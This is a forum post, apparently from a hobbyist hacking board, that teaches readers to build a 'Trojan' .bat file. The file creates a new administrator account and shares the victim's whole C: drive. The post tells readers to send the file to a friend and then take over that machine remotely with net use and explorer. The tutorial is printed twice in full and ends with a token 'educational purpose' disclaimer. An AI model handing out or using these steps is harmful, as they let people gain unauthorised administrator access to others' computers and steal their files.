Search
Latest topics
Who is online?
In total there are 2 users online :: 0 Registered, 0 Hidden and 2 Guests None
Most users ever online was 50 on Mon Apr 12, 2021 4:46 pm
Social bookmarking
Most Viewed Topics
Top posting users this week
No user |
Like/Tweet/+1
BOOKMARK US
Create Trojans using .Bat files
Page 1 of 1
Create Trojans using .Bat files
What is a Trojan?
A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user’s computer system.
Let us have a small tutorial on making Trojan which share ‘C’ drive and creates a new user with administrators access. We will use NET command in this process.
To know various commands involved with this NET command, Open Command Prompt-> Type cmd-> Press Enter and type Net, press Enter you will see something like this.
In this tutorial we will use net user, net send and net share:
Open a Notepad to type the commands you can also use command prompt to check whether the commands are working or not.
Command -> net user username /add
It makes a new user called username(you can keep any desired name in place of username).
Command -> net localgroup administrators username /add
It makes the user(username) to get added to the administrators group.
Command ->net share system=C: /unlimited
This commands share the C: drive with the name of system.
Now keep these three commands in a Notepad and save it as any-name with .Bat extension and you are done.
Send this bat file to your friend as soon as the bat file is opened victim’s C: drive will be shared and a new administrator user will be created. Now to access the victim’s system you need to make a session with the remote computer using net use command, you should execute these commands from your dos prompt.
Commands to make this happen:
Command -> net use \victimip neo
In the above command in the place of victim’s place, the IP address of your friend, this command creates a session between you and victim.
Command -> explorer \victimipsystem
This will open a explorer window in the share system which is nothing but C: drive with administrators access.
Now you can access the victim’s computer. This article is only for educational purpose we are not encouraging anyone to do illegal activities.
A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user’s computer system.
Let us have a small tutorial on making Trojan which share ‘C’ drive and creates a new user with administrators access. We will use NET command in this process.
To know various commands involved with this NET command, Open Command Prompt-> Type cmd-> Press Enter and type Net, press Enter you will see something like this.
In this tutorial we will use net user, net send and net share:
Open a Notepad to type the commands you can also use command prompt to check whether the commands are working or not.
Command -> net user username /add
It makes a new user called username(you can keep any desired name in place of username).
Command -> net localgroup administrators username /add
It makes the user(username) to get added to the administrators group.
Command ->net share system=C: /unlimited
This commands share the C: drive with the name of system.
Now keep these three commands in a Notepad and save it as any-name with .Bat extension and you are done.
Send this bat file to your friend as soon as the bat file is opened victim’s C: drive will be shared and a new administrator user will be created. Now to access the victim’s system you need to make a session with the remote computer using net use command, you should execute these commands from your dos prompt.
Commands to make this happen:
Command -> net use \victimip neo
In the above command in the place of victim’s place, the IP address of your friend, this command creates a session between you and victim.
Command -> explorer \victimipsystem
This will open a explorer window in the share system which is nothing but C: drive with administrators access.
Now you can access the victim’s computer. This article is only for educational purpose we are not encouraging anyone to do illegal activities.
Similar topics
» How to fix or repair corrupt files in Windows method 2
» How to Repair corrupted files in windows manually method 1
» How to Repair corrupted files in windows manually method 1
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
Thu Oct 03, 2013 12:36 am by Admin
» Dish Network Channel Starz, aim my dish network dish
Thu May 16, 2013 10:02 am by latinnoc
» Dish Network Little Elm Tx & dish network via broadband
Wed May 15, 2013 3:37 pm by latinnoc
» Dish Network Moving Promotions
Wed May 15, 2013 3:06 pm by latinnoc
» Dish Network Twc Channel - what channel is fox 1 on dish network
Wed May 15, 2013 9:00 am by latinnoc
» 005 Error Dish Network
Wed May 15, 2013 8:43 am by latinnoc
» Weta Kids Dish Network
Tue May 14, 2013 3:21 pm by latinnoc
» Dish Network In Augusta Maine
Tue May 14, 2013 2:44 pm by latinnoc
» hack torrent for increase speed using trackers
Thu Apr 11, 2013 4:09 pm by Fauriza